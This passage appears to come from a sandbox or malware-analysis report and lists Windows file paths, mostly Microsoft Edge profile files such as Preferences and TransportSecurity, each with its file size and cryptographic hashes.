5928f9019644834482840d2b0e490925e9133f2e

SHA256
3e8753cc8dba657557eb1a3d8039566509e9cc8f28f153edb39da15bc04c5b7c

SHA512
cae7948b03166ac8fe62834d37b9a3e76654a1c367462bdcecd4c0f51a0dba34c7db78e6c8d27cc2a8a2e988a6c613ca38ba3efb0a22ec756f7b457d450571ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
0699b7b75cb8c9c1093628bb5c4c1939

SHA1
11ac0cce396233f3a8395acffd99aa19cca458d0

SHA256
c05cb7930ff1d14ec2aa605790c056d115773a2445658c972d05b8e523e0f3f8

SHA512
0812288e36c690efd26534e1680000161bfbe37eb4073c51a23633fbc5f6aecaa2689e40f5f8e7d172608445df6efc1e886fa8e5a8ff76633a9ba426fc5179dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
2f1aed6cf335b8dfa6f85aede8a90616

SHA1
6728bfedaaf1d41c7e8c39f60888376fe57c4fad

SHA256
e7d8a48ede88e2f4928b1a197c20bf38e795c2c2f2d34f98bc7062901de35bad

SHA512
21d980c8967d5141f0e4e7ade795c1f5693e03761ef7ce9294420a4b969b4eb5802b5d853b1be5b597b66c30ac31c643d8d1cbf3319330965aa5383dd18bba30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
3f24bd6be95b85209e8d53a8d5fd0204

SHA1
789dd0826869ed366535433a7a7c7b28cad5a3b0

SHA256
04cc225cd5905909ac897f2150507aa4b5607a8cb4c9312ce59056ca696696d7

SHA512
c7e04991e3affc95c66b7cc5089940c74804c1fa4ee83320ca26f134385d79177875cda538122209ef74d70b2b01f65d13bc2dc01d282b02c88f5183325b12ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
88789834c82e4b985051a4d66598fd73

SHA1
519b1e085d6bf1cd008dcbb59d456eaa16af5f95

SHA256
9cc502b1f811037cb4502a18bfe33f0ce0a0ec825c31d98c1b6a9ce8a0545bf4

SHA512
3537d247d3a4cedf5030f2be04881f4fc2c292b66ab4d881bd0d2125e87ada7154587e95b5d9af4f0cd56239455d6442f32c80bc5701cc532313abc054ca8f9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
2b808f31b11645c52d82372bc2df57c6

SHA1
3b33d875a6427f3d39a6c9fa9f3ea02acfb9f2df

SHA256
8b4454825b8ac2c9ac933f8f51e878dbc2677be876235279a167c854663d579a

SHA512
d08671082b11e9ed2f73e0f6b001a0531aa02bbbdaf4512c4f6a359221b5abbfad674b929dfe75edae9e4cdf76b39ab272a12394e225995f82e1836f3f4c6466

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
2c24588edcbf5a40e154b1c23a322747

SHA1
68c354e1ef60f44db6c10114daf6e576480b0261

SHA256
11eed914de179aedcfcf61a6a8ed4292fb22bd6c8ea69e33dbc68df022c1dec9

SHA512
0e7f56fb605e3cf19621e7f255d99f16f5b298d630fabee3977daf2fb6b7597b330b1947db9e1f8408f38048e21b70ae92af139185867226b0cc090cf7b7bd5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d7bc8f3b8e5aa0d70d65b3f20522d868

SHA1
81a9160974e70bbb8fec0c0b87ef562d8490d182

SHA256
72f6c934a3819e1d0ce80b565006bce1f4fcd906fcf8225b363cab428dee8d7e

SHA512
5d0c53253f84708f88f33c324ddc017146e1e6ab2c07aa4a9a47840d980f11a408f41d8ddf3fe3b91e3e52a9f6b52f8123c0fe7ad223da52cff0e89a0e9ed2b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
89e03ce9aa3de2c8a07051eee01d08a1

SHA1
48b71a790372ad65eca4a2b39fba313fb59aea03

SHA256
3d457d29adbf8064bdcd6a7941996dde14f25b01b91ada44c00e976e3025cb7d

SHA512
8b35204f648246147f9389336d12ac4ad8a184be8569e431a652e0a759deeaf753a6ee6ef46d635a0a7c0071bb3ac180ed8043968d44727d0f12fff0a1142431

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
758edd7307bfe51eeb0c8fc76905207a

SHA1
829afaa7bb724f14ebacc013430c81e0087d792c

SHA256
8e53f578f81e5c78844f628d9953722866114e461e1f0cec779efb4c0c840d0f

SHA512
0feccb3e060f37e746d73eeecb9eb95baee33a736da4dcb392bd3492a66ca21dd2c1fbed29b856c43d507d4d4adf20fbfb6e3e3e5b842d9714f524677def48ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
7084d304cd6c98cd85e1f7f98e9e05ca

SHA1
42c16024a2e9f9328a1c8d8e0f26fa14002d1d58

SHA256
5c59d7a9113af32df87a7e5b41b5d43c333e86219615251269e486d8a4329339

SHA512
03c21ea0a086bea9b58bf499ff5e6ae05693aec7a39aefd17fe0fa61d3d3caf90a63b6e82e6c3ddb6b41bf9e6c3c34b4c3a3ba9244962b899cfca39c383e895a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7262c13c320e556fa4932e06dc165cc1a86f0365\a4cbb2d8-3b03-4a3e-8879-1516d0ccf33c\index-dir\the-real-index

Filesize
96B

MD5
f156d65d3395aff62a25de09e27862ab

SHA1
88f82e245ad8c7972dff777878c9ed2b1c6d223b

SHA256
84982c0ff07b37998cf5d91126b8d7cede31d75915ab0de14f8f62767230157a

SHA512
8f43f9d9d4221fce7a3f2955a38e06587cdd6609822b5f9e17a16394ffb0774166890ca35ae1364a987f5974f5310b7d48956db81b619d1ae696100023375b5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7262c13c320e556fa4932e06dc165cc1a86f0365\a4cbb2d8-3b03-4a3e-8879-1516d0ccf33c\index-dir\the-real-index~RFe60bc01.TMP

Filesize
48B

MD5
4cee5dce843a80dfe1843a68c0bc4de1

SHA1
27025ef068263c8d447c15c6907d9472c81c1ddc

SHA256
dd60b9341d07d1cc531bdd8bfdeaa6245a63740748b4e335b655941bba0e8870

SHA512
40f3783c64c223c382131805fa5f886ae652ad4a5ebfb2e0116f0f80db632aa86890a4ce6a78e441d91f0612be38847b2f1a593028a05c6c55e537758d48fba1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7262c13c320e556fa4932e06dc165cc1a86f0365\index.txt

Filesize
84B

MD5
eff80737cb6688e29f8489782239bd63

SHA1
68c8d5cddf262310ed0932e87f5299e50f5b0349

SHA256
fe010760a52fa0923f65f6bde90b264486efd3338a4237a7342018c108dd3253

SHA512
3c51a6cbfd57ce8386a197b9ea35ff0a563a8df1aa703a02923d880aa599b8e68e797c9316c2ec7c4a0fa12987f42cac4fa7751f1caddf92477f595a400110a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7262c13c320e556fa4932e06dc165cc1a86f0365\index.txt

Filesize
79B

MD5
2deb7b2b61aac416a937b60a3cae8cce

SHA1
fe3dddeee04454ae99e8ef8dab6be626ce431fd5

SHA256
b45c05444a4233578b5e7d9d897729a1cba3101aa0457969c8cf18dae8587ffe

SHA512
bb74ff517edb3bb8b3520c5492792d53eed8c4e09b674b0afb9b3b7919c83a5cfc06c634875d08c6c79078d552e619719c02a752c91cf016ee706009e0fcfaf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
e264a508a4898b152ba169d7c40a4cfe

SHA1
491da56c5bb6c046b082189c490880c73933c242

SHA256
c90eab2aeefc8e55d2a9333f33c637a1ad72343e8716497c77ecaa8871fe9e49

SHA512
38612f2232e6efa86b6299b7a07f18c49ea511c2bb26209a905ad7c2a0dc78180365273c41cd005eadc7eecf82e150b6dc8426c7476a1dff77596d1fa98aacef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
ea8681d200daa91675098d26cf715802

SHA1
36e2e3c91697c7aed59e457583dde76fdfce1bd1

SHA256
4745e6207826c53bbb8958e9fe0ef676191a4c9069bdfb5a80108383e809b2cd

SHA512
b8288da6749cdb624e7424fee1dd35139ed39d1aa7fbd285c4708a56d80ace4c0cd5622b4f4558f9334af9d7ef9cf57ef1c30067e74096214216d54cecd8e1f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
2b78f1823cdc5a958a688acd4e4bfaf7

SHA1
52039d9439d363244fcaa05466a082d394c0930c

SHA256
756e2c10ace8907cf75cf9a93f6cd418953f815d51779d31085f675c1d01ac2e

SHA512
70236048ee4724bed458d58e85e21371402aad5fc24547f230a5273239011df82f13fc2ba83634e614f5d1d702f2a9147629b7b4c26a69af9550b5b89f908c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58aee8.TMP

Filesize
48B

MD5
236fb021b31f86ca530407813bdbb40b

SHA1
32708fa3719c706e999a5438f19af2bfd7aaeeb8

SHA256
cba644733efcbe51ca7b8e3283d7b31e8b09999e97e8586ce6eed8dd2e659bb6

SHA512
fa86487439758d4fa704570e482715e8586312d8dd0e12622dd84050714c5c853fa2a68fea1c37b0b28ca8ced254c6942934382d6daf102baaf170555fcdeb2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
cbcb745421cac669dda2306a216b1712

SHA1
dc7abb214d9320957af25f110171e21de4359644

SHA256
664f524903fcee9d6b07178c8d834ef30b50479662b7021ebfcb842f49230d25

SHA512
c0e2a5d26a77781b706c0a77726f07f837d79ff93b1d5f999f74a3f2a822051b52f0e60afc2876cf9cc35d37f327869f2bf21c41c98df7b4076764bf3f7ce44c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
aa8d3ff8c349f3516dc49c74be835bb9

SHA1
622179bc4a02196b7b86fc76d6463363e2fddd29

SHA256
1bef85fd6eabacc72b1a5613920563333c9bb4447d0356cbe6d17a5ead5ad8d1

SHA512
1d6bb88aeee5c5c27384fd9faff4e2aeedc1a8af57b5b742d3969d31eacd1497c97585b020b00f6138daca09c00c159e028ae5fc00d649c639ceb017251c45a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cd9e26e1e1a1533e70d15a945e4b048d

SHA1
6ee508ced3d67fb2276c79deeded4f7631a9b0e0

SHA256
c6393630a014e176905880dbd43b96909fe5afbb46945ab3f7b9e67743a7efc0

SHA512
fa36c1f603a79bf97c0f5a462638137da9fd53128fe908746e07fbea80c88fe94aba51c6bb20456bf3cc5e622136699c0a0c066e36282cf9eee5004591779674

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
9c24088e59c2b313c6d63063f7a782d7

SHA1
5db923bfad888e0af3b78a81a33a89623b72a02e

SHA256
77b5285c8403748a6d3a0943e3bc9386ab403d1c968c949652af53d53dfc2242

SHA512
1dd6c5a785212a3358e236d18fbf7ca86e28bb06e28b5b292921e5743529345319009ef963d3d977f280fed40fae527865c716dd1df3ea822ae549434b5df7a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
f11328b947cb8008f5b62c2cc98a2525

SHA1
72c0a16cab7c6bb56f000d625945ebbe9eaadfbd

SHA256
5a862b20e77b82f8b6037d7a3d02f06fcfa3540757e18ee023bbef44e3c77c15

SHA512
4f620f6a21db36478599ca30b70ef76a54d914b2d8f1c706f73689f3d95aeec0d34901c6133c3124ee7e4aedd1a142d691770bb9b4d0a53612766cdc1f2c2713

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
537B

MD5
6e6c9d0de21f347f2f7ece8afa94e898

SHA1
8b31f489c8f9ca1e27531693912da6cd4b55b173

SHA256
884747a22cb4d7ac1f12e630fdd3ca6fb59f1d3aab0baba10633f68e1f21cbb3

SHA512
8883fb3d3347c43b3e6c8f07cce7376998c136d7d349aba7540a6a7ecab579d03929abe28104e04d13a0bd32f8393f317e2eb912ea5f4ca55208c7eb8fbe6326

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
dcd3731cc80c42ce8269f1ac00aa85d4

SHA1
18ba87f03f5d05371d5a044018917a7620fb64f1

SHA256
3f60d2de37360c33de6cef54ac9d5144ff20baf69da2b478bf54d9459d5a7bd3

SHA512
2b61d9ee1895b676cff2414f0ff8662a3b5bd489f4988addd6e4062836c3706ca32192583d59667d39d360cce8e534f25d18e8075819938382e7d2e2573330c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
ae13fe7c9f288589c4d4bc7c50289210

SHA1
17db646620e86c382fb472b1b5db613144b16b70

SHA256
297e7e4365d6ba3296dd64de4ce8752acae7566d4d76a6f1dea2f4c89d4c1e3b

SHA512
d00b9a5586a6e313d150a8a499811c11f2c327d74fb098f0360e5e79c86d197045b7e89abf4f23fcdfd5603f37a293759717e8e074826390edf8124498e966f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
00736317410282ef2814803d6c91e31d

SHA1
ec86fe570690de2c9807c6603b3f028cb1724112

SHA256
0166f27867395fbb69f0345e45239b9b17285496e500065b711697e786bd74de

SHA512
c3e9616718b8f97176588245f232b48d91bc5dd4781124f575105323560ff83fe70d8581ca29b2a144e1b2bb83cbd0a2b5bd87111984b839df985ce0e81235c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
2d7a3f2234b295828dabf7edc5d04932

SHA1
de679c756a0897ddfd006d1b91b80ca0d45c6a80

SHA256
a17eaaac54b397ead555152fb5f3f2b8649f0e50c292ae02fa3a83084cbbc295

SHA512
4211a42579f3538734f89326ca2c3e585e3246bfd99af0ff068709d8bb07a77012cdca3894188cf6b9d766985913aecec374c5121ed230e3fd4abdf58e047a03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
8a8916ed3549f0088555501eadd98a4f

SHA1
2f78a44a8f026695984456ed337aaac136454843

SHA256
1cf16e58bb96d0d2333f3ccb34fc2dc83d4635e924a61e4efe526a9348b2b315

SHA512
4ad6d0091dda3f9eb089ba1131a2e8901f434eeced497fb58c0835143fc43c7a97d0458c906aaae49496893195ad778be2dd0ee18470f71ebae65fb14432cc27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
6d78615131b0d4bec98858a975d8a4fd

SHA1
d96cb5d8d0a582f441d350444addd248129a7d27

SHA256
0fc1a222fa8901f8fa88b380303c05aec10a6de2397750003eb65fb92d46d142

SHA512
4758c2668b0cdfda412fb001025455048bae56106ca0c7d1b8551622f010ccd2a3b591ae6b18780e2144f0053389b38010c2c3517b6154bfc2ddfc0da9dedac4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
9dbcf033d0719626cd31d4c3ac2c894b

SHA1
ff154d1b5e67dda319343c2a68304faa09765309

SHA256
910e8365dea801b91c6df51e87f42e1fa8f2b2c2e306527f3ca8d9bb9e2f7fcb

SHA512
0c78b41410f6b37cf82ac9cc5d8cf4885527bf11d35ee11bc5b7ee10ad8b5cf5f77ede9433f4bf028cbc1067b3f4ec835415f353e5e4e7c92bc7c37ee07c63c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
96d4c5c51d399907afc03d1dba2387ad

SHA1
25c4279acb02c5be7c1678a81aec8d97624b3653

SHA256
a7ddac9ad8b8d9b356d26c8c5f7fef12bbc05c34b239284b19cb025a5075215c

SHA512
535a1e72ee065868ad5067bb3e63f147837fe0119461807f0d43bd1ba1e7ea390666b663c8de1818c75d39c5eb6733d68f0fea693534a528774111edc0d9147d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
b126a68f4ed5bf05972238af12692c86

SHA1
ddc9e4884b96e06e237bb845bf5fb6f807817220

SHA256
f20afd0624bff6842a074e17b3d7ccbe24b4ac44bc9b5c6bba1fcda393154ced

SHA512
97a8987bbcc61b46ebd335b726f88992e78e24e09920be1bdc0d8e00be580246024039a5e1f17c652477d2dac5314e3f9ef886a0ae0868a9d9363a4d3280862a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
f794d5933c74e965ecb97251dd608b8c

SHA1
0ea28e6f95a07bea9fcc64ddeb866069a0380e3a

SHA256
684bb8346adcc355888ddbb62f8df4b29e8f42f1cae76b1d0bdbafbd49ac361f

SHA512
114859a09c4db99f41ec26b1de8dea8764c2b766e2b534215cc0aef6b083aff9bd0437528bac94f6cf76ab9455cae0e24402e8fc12f24849bbbc154eeadbd908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
929f693fbe25ce2e9aa5be7f714881c4

SHA1
57db057c31f552d5aea9e03548e7ad4bc70c8a4c

SHA256
db89b727e7a939d7f9e681784d740588cd60dda04586ae45f2182a343e8fccaf

SHA512
0eb997083ff9044b7f7dbed57b0094c7f02d7ec7a53f43d5334e96b078bb2a4bf5c9e1900c4a170ae1b836d94315dbbd2072f82ed0a53ad8d92f2bf025582baa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
5b4600026615e55f9d9bda3c52ac2d2d

SHA1
ad222ed0b9dca3a2bd7dbfedec64b0f44281353c

SHA256
83582ff6b7ccf6067b1a710395628b387159f9f2f221fef216c4d4e53e5987ff

SHA512
318bd7a410691fb3769ade910876f9e6b98aa00cfacda233750456f557db9d7d5f7f88c1370990c0258a8397a45be28b2e5b032bf26c45ecc3f21f31cb3dac8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
7a8963e84546315096df2bb663b3b917

SHA1
11040a84701edfa0a64467bc593ab125df90b17c

SHA256
9c86b054c76ac3bee51e00233912acd32e064a06c9e7af019b80f09025ffeb83

SHA512
db199c489446e7d976e33914af7d66011bf618f21a170eb33f691c04b333d50e7c51e31980cf5798d4ff027be7611269d7e2ab4e6e27e3e241808f0965405fa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
30c6f109f60fd77384de7209e5c57009

SHA1
b94176f2e642512f79f7cff0a788e78c7be36a37

SHA256
69ae604f9823479167d63e56a22e0bff3ea6d86c247e24989b5aa5b91f4a0fb3

SHA512
1eef87a7b77fa7362cbbd274a2300d46b0f781986e970edb810140615b25421dc3202a65a043b884d7dbc0be54e62f025c04f8501604e2f55b105768a9c477d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
488bf3795dbb9a96f94f43541eb7764c

SHA1
22e3045bb0bbf482416afa1265e39e38bc9d48c5

SHA256
707c63324cb98c7cd47e00a9c16f9cf7ea0da11a57af1422dcb07f840920179a

SHA512
f4d070b8e582daeab0789f26bb0ace5808c94f3baba1e38ab2a166841cbe80c6303606e48272d5511369fa05c7539dd9b6258105948e797a43b14f1f4a2c32d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e7f6da3bd056c744b91fd55c397c5a25

SHA1
ae2229cdbc103760879ab1521ab63f18ddeea2b0

SHA256
cdf25a1e41c1fb6df7ecb4f9a972a0a7f7f1af70eaf31be1ddfeabbc6d03d558

SHA512
a8ce985a5de37fec5deead0436bda3f6c1f69d0c8005e614c5314cb0a0deaad04d8d24958851df2ca1483be9cb8fc6e8e47bcddd18102b1d184d538a6d322ed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
7138cf941c366180c076083ca3769009

SHA1
3bfa24cef7d7a4e02a60ac53b332977c3b1addfb

SHA256
3ca144a499df7e3a6e95df0629ba76caab6aeca99406740cedd3ff8ac6813504

SHA512
c1af778bb9fb042e5f3bfc44c3ea0cdbb00253e6d9b6f67d93a9bddd68ec3584d5f7a72590673c77c4bd5d139def1a85e038177f35f13dcb9f2a13dadb05ad31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
d53701c0ddbbaf6ee708add2d849c9e1

SHA1
01a26fcab6918c4cccd821c59cf41774b6f00096

SHA256
59146decc4ff4596d316e090d74e6c03812a13fc869a65cb49a84ae04a59dcc8

SHA512
2aa7d8f47329728a355b55340a2289c3a47d74a74b8c07da32039d44441588cb2900e1205334b6a3aa8ac59fc50b3689aebafb849af53d4d786aba74077f7dc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
a7f760d5dadae7a7e5dcd9af04e7ffb3

SHA1
40633504456a6cd40280bef12410f6559582975e

SHA256
88ec0a4a1e209b11c2eb004f89665d15b4a0bc0237df11440c04576cbbe6e555

SHA512
465e6c45818851e139871394fe6a4144a7e31fc504fedcffcce9cba2b273b68e50cb1bf317885a334a74defe786398185691f7c1d48b982c8be89dcf2888095f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
a760cb3277b60be6f15007b06a8dbdaf

SHA1
475af349dad39991bf5a7a73e48f5fd5643831c3

SHA256
f80e66e6b8ec2efffaf876e3ae2d1c802ff34fdcfcc439cc24972909f23fecca

SHA512
8dcef75ba8cad8664efbbccb3142b4ee6148205ce758b91b3c675116f64e8c8f174ef96781201c97d9e15ae174292a7538ae299ca5ec13b2ea2727f6cf912be6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
1ff59d373a4a38ba573c4a29cde17403

SHA1
a02e1c96f904c2b64495ea898583e0f8a53d267d

SHA256
92bfde7d5b4fc21f9f25d004703bbe8da8c60f9a1da5b5fd4577fe5e48e517e4

SHA512
a4dc123c3773beee351f1cc7a01301fdb8090611e3cf9fbee30ec8e686dc6575fe3153af614fba070fff825ddb118ebb9e3e42ba0c0aaecb1cf0d333ebd856b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
ee3aafb01ff15df3064bb4f87b76a6cb

SHA1
8935bac864f3b2dd653d68b78ef7b7e1e18ce86a

SHA256
ab685d768f37dbd7323670e25a4ddede19928f1f23621cc0cc098adfc5c62d29

SHA512
56698d56de3fb2255e4983c5a3515fb386fe8576392497476666514acc928ec85c9e2db94954354ceff045d93351b55d1f383444c828f8a27fdb3a23052e8824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
27b36b1f87356bad80c555fd6d3b8b66

SHA1
51f94ccf21ec3ddc388f565cd1baf4c4a592d716

SHA256
92978d9aff57eeb57471fcef14fa634ff9d42069070808dd1f62d99e9bc6e392

SHA512
fc432c4eb276f2975892c386417c7f8282957c884c5e5796a47f022934814fb86d8f892573ed3bb8ef71c258f67ecb12721d20ddbeec0e5339e13cec20abc029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
c34ce67bb2121571d4ba1e31742be9b6

SHA1
effaaf31cf3531750127f056eb08401a2a933f16

SHA256
5865a792373ec3c7a88eeccd3ca66635707f5d824df50cc2832b7ff407037748

SHA512
8ff525ea915b6c324b4903b9dd814cd4056b25743eaa6540c1fde65ecadbcbf88f4dcffc29f289859ea6c916aa4c82e16e34948c72f9253b4192846f7cc3668d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5862dc.TMP

Filesize
370B

MD5
077e7cf079b6cbc41597c31d0be6b2d7

SHA1
dfb9f246ddac86055ce015696933c282437b1364

SHA256
dee2e046feeb18aa6c6bfe45aa8efb157a3c19f208dfb4832945c3a6c403af0f

SHA512
10cb17528b7cd5abc31104e2ecf1c50ddfa254519c204475b412e6326ec258541e85f890b17242fe2cfb2db89c01d9ff16f5a1c163c4c9bc69722e779e0bd5f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bf85b97e-3c4e-421f-ac2b-5593fe3effbd.tmp

Filesize
6KB

MD5
14b153a6a9d45c9aaf6239bf982a2e86

SHA1
2429ce386dbaa03cba6edc8e2cb369b915b68d2e

SHA256
0a45e351203eb1ae6eb0a11ae7b2aa4a2e6c4adb77a1ff9c6d42559f6a8eb807

SHA512
f99587a09ef02ea526a83d36c27d40e7c51e02ddae4bbb49f34ad0fc0aa0b22e6156341657044b1394aa68d9675651ba891104099d1e353936d9158622ba0a60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8f4e228916d6add909a4fc8493c758c3

SHA1
0c8699e717311c196d97eb33eb6a99c50be6c4f2

SHA256
56658a0c51514e952f02980849ac36f12e81ccdf4d4f85b52e2b26ee64a00eb5

SHA512
52fb88681c28d5b549f76873a9ff1050af2d3870fa084418fd2f3dcf8d94ab73857c8a770fcb1522c7ba2a2b08271d88a9ce170539c76e449a536117bff16436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ffd0bcd9588188c7a30f9f10498d1688

SHA1
24fe18544dc1d342f465fe9fca5a0b46a4b5f61d

SHA256
4168fc2555974a976a5bdf512a56452df6101db2823c5f268a981f073b8fb424

SHA512
f41abdc5a8a8f76cdf3ce21f7a838c936c9af733b9bc32c30cbceb3f371f5a926ee39486ec3bef09d7c71a331f7285903d38f371f3796be1e3a511c934f91d66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7bafed82b23f8d36d5a07c838786c8c4

SHA1
561f4c700494ce2eb86e4b615aa68479eae0a32a

SHA256
5ac3bd22b82230a39da56c85df17fe5a710f4737281249a00ec479b1e08d857d

SHA512
f8d381d80099b0ec9216f7db5393a20821e42ff952b783b559d54fc153ec61745ad42fd2853bd47feafd60f33006050eb19a8e02612c8bad1d1e7d7ccb112579

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
14KB

MD5
f876a848bbf9b31a1b9057a3eeeb274d

SHA1
89ef388c16ae1f6c16bf36ea110f318d84034214

SHA256
e777517221ddf08e87a86cdc02b473e398086f9a7cbe8a0807fdb1dca0d02bf1

SHA512
81ae1c85aa52aff8bbb169635858e775cad134f7fbc2528c456e89fec34bd400b8062ba5c37dd2cb2522ca77b2cb1fd44fdb002c7d609ab4f2f4351b5b734abe

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\64b173cd-f3cb-4ac0-9879-3f5c695e3aee.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

